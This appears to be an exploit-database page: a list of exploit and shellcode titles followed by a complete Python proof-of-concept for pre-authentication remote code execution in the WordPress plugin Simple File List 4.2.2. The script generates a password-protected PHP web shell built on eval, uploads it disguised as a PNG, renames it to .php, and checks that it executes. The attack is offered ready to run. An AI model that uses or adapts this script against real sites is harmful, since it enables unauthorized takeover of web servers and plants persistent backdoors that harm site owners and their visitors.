
51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
95 lines
No EOL
3.3 KiB
Python
Executable file
95 lines
No EOL
3.3 KiB
Python
Executable file
# Exploit Title: Wordpress Plugin Simple File List 5.4 - Remote Code Execution
|
|
# Date: 2020-04-2019
|
|
# Exploit Author: coiffeur
|
|
# Vendor Homepage: https://simplefilelist.com/
|
|
# Software Link: https://wordpress.org/plugins/simple-file-list/
|
|
# Version: Wordpress v5.4 Simple File List v4.2.2
|
|
|
|
import requests
|
|
import random
|
|
import hashlib
|
|
import sys
|
|
import os
|
|
import urllib3
|
|
urllib3.disable_warnings()
|
|
|
|
dir_path = '/wp-content/uploads/simple-file-list/'
|
|
upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php'
|
|
move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php'
|
|
|
|
|
|
def usage():
|
|
banner = """
|
|
NAME: Wordpress v5.4 Simple File List v4.2.2, pre-auth RCE
|
|
SYNOPSIS: python wp_simple_file_list_4.2.2.py <URL>
|
|
AUTHOR: coiffeur
|
|
"""
|
|
print(banner)
|
|
|
|
|
|
def generate():
|
|
filename = f'{random.randint(0, 10000)}.png'
|
|
password = hashlib.md5(bytearray(random.getrandbits(8)
|
|
for _ in range(20))).hexdigest()
|
|
with open(f'{filename}', 'wb') as f:
|
|
payload = '<?php if($_POST["password"]=="' + password + \
|
|
'"){eval($_POST["cmd"]);}else{echo "<title>404 Not Found</title><h1>Not Found</h1>";}?>'
|
|
f.write(payload.encode())
|
|
print(f'[ ] File {filename} generated with password: {password}')
|
|
return filename, password
|
|
|
|
|
|
def upload(url, filename):
|
|
files = {'file': (filename, open(filename, 'rb'), 'image/png')}
|
|
datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path,
|
|
'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'}
|
|
r = requests.post(url=f'{url}{upload_path}',
|
|
data=datas, files=files, verify=False)
|
|
r = requests.get(url=f'{url}{dir_path}{filename}', verify=False)
|
|
if r.status_code == 200:
|
|
print(f'[ ] File uploaded at {url}{dir_path}{filename}')
|
|
os.remove(filename)
|
|
else:
|
|
print(f'[*] Failed to upload {filename}')
|
|
exit(-1)
|
|
return filename
|
|
|
|
|
|
def move(url, filename):
|
|
new_filename = f'{filename.split(".")[0]}.php'
|
|
headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1',
|
|
'X-Requested-With': 'XMLHttpRequest'}
|
|
datas = {'eeSFL_ID': 1, 'eeFileOld': filename,
|
|
'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'}
|
|
r = requests.post(url=f'{url}{move_path}',
|
|
data=datas, headers=headers, verify=False)
|
|
if r.status_code == 200:
|
|
print(f'[ ] File moved to {url}{dir_path}{new_filename}')
|
|
else:
|
|
print(f'[*] Failed to move {filename}')
|
|
exit(-1)
|
|
return new_filename
|
|
|
|
|
|
def main(url):
|
|
file_to_upload, password = generate()
|
|
uploaded_file = upload(url, file_to_upload)
|
|
moved_file = move(url, uploaded_file)
|
|
if moved_file:
|
|
print(f'[+] Exploit seem to work.\n[*] Confirmning ...')
|
|
|
|
datas = {'password': password, 'cmd': 'phpinfo();'}
|
|
r = requests.post(url=f'{url}{dir_path}{moved_file}',
|
|
data=datas, verify=False)
|
|
if r.status_code == 200 and r.text.find('php') != -1:
|
|
print('[+] Exploit work !')
|
|
print(f'\tURL: {url}{dir_path}{moved_file}')
|
|
print(f'\tPassword: {password}')
|
|
|
|
|
|
if __name__ == "__main__":
|
|
if (len(sys.argv) < 2):
|
|
usage()
|
|
exit(-1)
|
|
|
|
main(sys.argv[1]) |